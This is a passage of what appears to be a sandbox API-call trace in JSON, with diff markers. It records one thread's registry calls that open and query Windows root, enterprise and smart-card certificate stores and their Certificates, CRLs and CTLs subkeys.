"caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1625 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1626 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1627 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1628 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1629 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1630 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1631 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1632 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1633 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1634 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1635 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffa0\\xfff9q%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1636 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1637 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1638 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1639 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1640 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1641 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1642 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1643 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1644 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1645 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1646 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1647 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1648 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1649 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1650 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1651 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000540" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\" + } + ], + "repeated": 0, + "id": 1652 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1653 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffd2\\x01f%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1654 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1655 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1656 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1657 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1658 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1659 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1660 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1661 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1662 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1663 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\SmartCardRoot" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1664 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000548" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\" + } + ], + "repeated": 0, + "id": 1665 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000548" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1666 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1667 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1668 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000548" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1669 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1670 + }, + { + "timestamp": 